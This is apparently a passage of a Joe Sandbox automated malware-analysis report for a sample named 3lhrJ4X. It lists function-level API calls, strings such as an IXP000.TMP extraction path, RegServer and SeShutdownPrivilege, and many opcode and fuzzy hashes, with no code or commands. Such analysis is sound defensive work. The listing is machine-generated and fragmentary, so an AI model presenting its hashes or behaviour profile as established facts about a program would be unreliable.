                                                                                                                      • Instruction Fuzzy Hash: A361A562A09741C6F7609F14B4887B9BB92FB85F78F845335EA6D426E0CFBCE4458720
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FileTime$AttributesDateLocalTextWindow
                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                      • API String ID: 1150793416-305352358
                                                                                                                      • Opcode ID: 8ba837678c1f67d615ec5eef46cb77bfad3a32e48b5654526580d0bdf889563c
                                                                                                                      • Instruction ID: a0cd89510531f9e663a3aad10c1a116c93e482a1a6140bb36d04c91847957bcd
                                                                                                                      • Opcode Fuzzy Hash: 8ba837678c1f67d615ec5eef46cb77bfad3a32e48b5654526580d0bdf889563c
                                                                                                                      • Instruction Fuzzy Hash: 40518032A1AA42C2FB60BB11B4481F9A7A0FB49F90FC45535F94E432E5CEBCE945C760
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$CapsDeviceRect$Release
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2212493051-0
                                                                                                                      • Opcode ID: 0d796e944f2108898d7f7223ae91cc33082503468592f481f03ae45c8c0a45dc
                                                                                                                      • Instruction ID: 1df6221510716cba5949be5e5fcadc8bc13735e2d576acecf3798f690d562455
                                                                                                                      • Opcode Fuzzy Hash: 0d796e944f2108898d7f7223ae91cc33082503468592f481f03ae45c8c0a45dc
                                                                                                                      • Instruction Fuzzy Hash: 7D316B32B15601CAE7109B65F8089FDBBB1F749B99F989130DE0A53B48CF78A4458B10
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocLocal
                                                                                                                      • String ID: TMP4351$.TMP
                                                                                                                      • API String ID: 3494564517-2619824408
                                                                                                                      • Opcode ID: d5ace99f2663905ba72166a92556dafad1272f0db083ef97e46a8f7b12bd3ef1
                                                                                                                      • Instruction ID: 70af88047359c613e1f6c7fdf5c938c2123e57bf33d6fa8de020b70df04ad7a3
                                                                                                                      • Opcode Fuzzy Hash: d5ace99f2663905ba72166a92556dafad1272f0db083ef97e46a8f7b12bd3ef1
                                                                                                                      • Instruction Fuzzy Hash: E3313C21A0968186F714AB25B4183BAF750FB86FB5F885334EA6A067D5CFBCD4058710
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1214682469-0
                                                                                                                      • Opcode ID: 05ae3199707917ede6f93554733ac842423239086612fc629f4ab3851e21dd44
                                                                                                                      • Instruction ID: 67a900e52ec75ef89c97f5546b16bd48d02431ae1f189504efa7f56c87b18cf7
                                                                                                                      • Opcode Fuzzy Hash: 05ae3199707917ede6f93554733ac842423239086612fc629f4ab3851e21dd44
                                                                                                                      • Instruction Fuzzy Hash: B3111A21A19B41C6EB109B15B4482BAFB61FB49FA0F884734EE5D07B98DF7CD4408B10
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00007FF761F73B40: MsgWaitForMultipleObjects.USER32(?,?,?,?,?,?,?,?,?,00000001,00007FF761F73A09), ref: 00007FF761F73B64
                                                                                                                        • Part of subcall function 00007FF761F73B40: PeekMessageA.USER32 ref: 00007FF761F73B89
                                                                                                                        • Part of subcall function 00007FF761F73B40: PeekMessageA.USER32 ref: 00007FF761F73BCD
                                                                                                                      • WriteFile.KERNELBASE ref: 00007FF761F756E4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1084409-0
                                                                                                                      • Opcode ID: 98c152f8f55bf9a598385b6332d329f7c6a89d95a4b0cf9b0f7515c751b46731
                                                                                                                      • Instruction ID: 8984baac847082fe99a51c3e267ee90b4daba427eb4a9545efba1b1ba97f4ee6
                                                                                                                      • Opcode Fuzzy Hash: 98c152f8f55bf9a598385b6332d329f7c6a89d95a4b0cf9b0f7515c751b46731
                                                                                                                      • Instruction Fuzzy Hash: BB215B21A0A642C6E710EF15F8487B5E7A1FB85FA8FD48235F96D066A4DFBCE405CB10
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Resource$AttributesFile$DialogFindFreeIndirectLoadParam
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2018477427-0
                                                                                                                      • Opcode ID: 2994afcc96e4644f858f991349daac6ec3ef4dc9132b2516fbef1fb9fafb314f
                                                                                                                      • Instruction ID: e138fcbf2ba8805358f97e0e10969e944e1b593bfed5a53d2bfdb08aee4e4e24
                                                                                                                      • Opcode Fuzzy Hash: 2994afcc96e4644f858f991349daac6ec3ef4dc9132b2516fbef1fb9fafb314f
                                                                                                                      • Instruction Fuzzy Hash: 9111853190E682C2F750AB10B58C3F9A7A0EB45F58F984230F95C02AA0CFBDA884C320
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CharPrev
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 122130370-0
                                                                                                                      • Opcode ID: fe64812d24aaa535377f96cafa4c6c3212caf3ba105ea9cba34c300c858a7088
                                                                                                                      • Instruction ID: 7aa55ae9c9f5511b39db7fe89b979334c8152a6635e70f299ad0f8010500a29a
                                                                                                                      • Opcode Fuzzy Hash: fe64812d24aaa535377f96cafa4c6c3212caf3ba105ea9cba34c300c858a7088
                                                                                                                      • Instruction Fuzzy Hash: F301C421A1DAC1C6F7116B15B8483A9FB90E745FA0F989370EB69067C5CBACE442C750
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseHandle
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2962429428-0
                                                                                                                      • Opcode ID: b743c40088155ea186d23191c44c420b4fd161faa50afe9f4e766b5de3d239a5
                                                                                                                      • Instruction ID: fc0907f9ba5980cd6b5daf6f95fc646e83a95fd094124a22e11fa0531b2bc334
                                                                                                                      • Opcode Fuzzy Hash: b743c40088155ea186d23191c44c420b4fd161faa50afe9f4e766b5de3d239a5
                                                                                                                      • Instruction Fuzzy Hash: E2F03631A09785D2DB1C5F25F5851B8B764FB48F58F944239EA2B4B6D4CFB8D481C720
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$DialogItem$DesktopEnableLoadMessageSendStringText
                                                                                                                      • String ID: $Adv$C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                      • API String ID: 3530494346-2714610706
                                                                                                                      • Opcode ID: 4787acaa4cb14b9ee032e1509576d07899f8c93a354d3e857d14b06fab914e10
                                                                                                                      • Instruction ID: d3a32b46ec63a5e679e3ae01126c84306359ee465e3d34cfdd0368ed22113dda
                                                                                                                      • Opcode Fuzzy Hash: 4787acaa4cb14b9ee032e1509576d07899f8c93a354d3e857d14b06fab914e10
                                                                                                                      • Instruction Fuzzy Hash: F77175A1A0E642D6F750EB11B8487F9EB91FB85F94FD48130EA4D02694CFBCE4068720
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                                                                      • String ID: CheckTokenMembership$advapi32.dll
                                                                                                                      • API String ID: 4204503880-1888249752
                                                                                                                      • Opcode ID: aca234308d6c2b9a7267944faa7f1f83278d608330c87f71542cc3174e944061
                                                                                                                      • Instruction ID: 8186408e0a5a7024d4a94c87e086b1d27b5149fb5438514f6572dbf7f8b9dc4d
                                                                                                                      • Opcode Fuzzy Hash: aca234308d6c2b9a7267944faa7f1f83278d608330c87f71542cc3174e944061
                                                                                                                      • Instruction Fuzzy Hash: 6A312876A09B45CAE710AF16F4481AAFBA0FB89B90F855139EE8E43714DF7CE045CB50
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ProcessToken$AdjustCloseCurrentExitHandleLookupOpenPrivilegePrivilegesValueWindows
                                                                                                                      • String ID: SeShutdownPrivilege
                                                                                                                      • API String ID: 2829607268-3733053543
                                                                                                                      • Opcode ID: 4521cc09d256cc9c0a3583f069d9fa5dc9083d0cfa193007e767185542f0c5c5
                                                                                                                      • Instruction ID: 4b8c0d70ef8a79b40ca29c11f7823effa1fc62f684eb1e57f697aea61c29260c
                                                                                                                      • Opcode Fuzzy Hash: 4521cc09d256cc9c0a3583f069d9fa5dc9083d0cfa193007e767185542f0c5c5
                                                                                                                      • Instruction Fuzzy Hash: D221C372A19A42C7E710AB60F0593FAFB70FB89B55F809135E64E02A54DFBCD048CB10
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4104442557-0
                                                                                                                      • Opcode ID: b417f0ca43b0f1a675a55b1394a59fc23cd165e7830d58b26484a22ad4f1a579
                                                                                                                      • Instruction ID: b48ec38102ecdbf942e5aeecd804a0296d93e2adc39081620307238fdbd3c649
                                                                                                                      • Opcode Fuzzy Hash: b417f0ca43b0f1a675a55b1394a59fc23cd165e7830d58b26484a22ad4f1a579
                                                                                                                      • Instruction Fuzzy Hash: 0D112E32A05B41CAEB10EF61F8482E873A4FB49B58F800A34FA6D87754DFBCD5A48350
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3192549508-0
                                                                                                                      • Opcode ID: 5301e7076f5ef957a13bc7f6d002c3f7f3b9a25b2f64b703cbde4610621febb0
                                                                                                                      • Instruction ID: 02ed9476b5eda8828f9a6ef8b95f6210963e4c00004851d15da8c2576c88e0dc
                                                                                                                      • Opcode Fuzzy Hash: 5301e7076f5ef957a13bc7f6d002c3f7f3b9a25b2f64b703cbde4610621febb0
                                                                                                                      • Instruction Fuzzy Hash: 31B09220E26402C1D704BB21AC8D0A093A0BB58B15FC00834D00E80120EE9C91AB8710
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                                                                      • String ID: "$:$@$RegServer
                                                                                                                      • API String ID: 1203814774-4077547207
                                                                                                                      • Opcode ID: 6e530289b7fe5922f9cfda438616e34a1a36475502b4d42f4ffce2e3ac89d0b1
                                                                                                                      • Instruction ID: 7cade1e39ca872035d1302c8ec493edd9b34c7e3145ba5caed62b40516847f37
                                                                                                                      • Opcode Fuzzy Hash: 6e530289b7fe5922f9cfda438616e34a1a36475502b4d42f4ffce2e3ac89d0b1
                                                                                                                      • Instruction Fuzzy Hash: 0502E451A2E682C1FB60AB24781C6F9EBA1EF45F54FD80735F95E06694CEBDE401CB20
                                                                                                                      APIs
                                                                                                                      • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF761F735E3), ref: 00007FF761F74A86
                                                                                                                      • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF761F735E3), ref: 00007FF761F74AAA
                                                                                                                      • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF761F735E3), ref: 00007FF761F74ACA
                                                                                                                      • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF761F735E3), ref: 00007FF761F74AEC
                                                                                                                      • GetTempPathA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF761F735E3), ref: 00007FF761F74B1B
                                                                                                                      • CharPrevA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF761F735E3), ref: 00007FF761F74B3A
                                                                                                                      • CharPrevA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF761F735E3), ref: 00007FF761F74B54
                                                                                                                      • FreeLibrary.KERNEL32 ref: 00007FF761F74BF1
                                                                                                                      • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF761F735E3), ref: 00007FF761F74C0D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                                                                      • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                                                                      • API String ID: 1865808269-1731843650
                                                                                                                      • Opcode ID: 2a5ea4b490894db445cb84de2448d12f1af4c9272f9454c89187ac1fef39355e
                                                                                                                      • Instruction ID: 7ce0efca0a77ad50624b386dfacf80e3a1331046e67ca00161ac374b4d9adc9d
                                                                                                                      • Opcode Fuzzy Hash: 2a5ea4b490894db445cb84de2448d12f1af4c9272f9454c89187ac1fef39355e
                                                                                                                      • Instruction Fuzzy Hash: 63516125A0AB82C6E741AB15B8585B9FBA1FB89F91FC84134EE4E03794DFBCD444C720
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Local$AllocMessage$EnumLanguagesResource$BeepCharCloseFreeLoadMetricsNextOpenQueryStringSystemValueVersion
                                                                                                                      • String ID: Adv$rce.
                                                                                                                      • API String ID: 2929476258-1496161719
                                                                                                                      • Opcode ID: abe435584ecd5f6fe87ce2b456f1e06dda66ab3f9fb72e6f330788004a039cce
                                                                                                                      • Instruction ID: d733f0cacc330a8da69dd5018a442ccfd520f30b40d1a56e4902722193e4d24f
                                                                                                                      • Opcode Fuzzy Hash: abe435584ecd5f6fe87ce2b456f1e06dda66ab3f9fb72e6f330788004a039cce
                                                                                                                      • Instruction Fuzzy Hash: C5617121E1A682C6FB11AB25B4083F5EB90BB59F64F845234EE4D07791DFBCE546C720
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                                                                      • API String ID: 2659952014-2428544900
                                                                                                                      • Opcode ID: 3b652cf53a0166bf7c173558fb1758d4a4d77de799b7ad200d32d7da73422a7a
                                                                                                                      • Instruction ID: 2fd3fb844a08e4537a6ce13043003e26e89a93f9a6f57ba4d3597ce2e75a5baf
                                                                                                                      • Opcode Fuzzy Hash: 3b652cf53a0166bf7c173558fb1758d4a4d77de799b7ad200d32d7da73422a7a
                                                                                                                      • Instruction Fuzzy Hash: A9518372619681C6EB10AB24F8582F9FBA0FB89F90F945131EA4E03B54DFBDD545C710
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                                                                      • String ID: Adv
                                                                                                                      • API String ID: 3785188418-921584719
                                                                                                                      • Opcode ID: 5437c451f9b0f03a7d5304c51dea48bd08e1932c988bfe6d4e908a474b1ba20e
                                                                                                                      • Instruction ID: bd4fe76d81e5e139e16b87fd42cf7b96b4ee6b23c96fbbd1cc62a05756df4a31
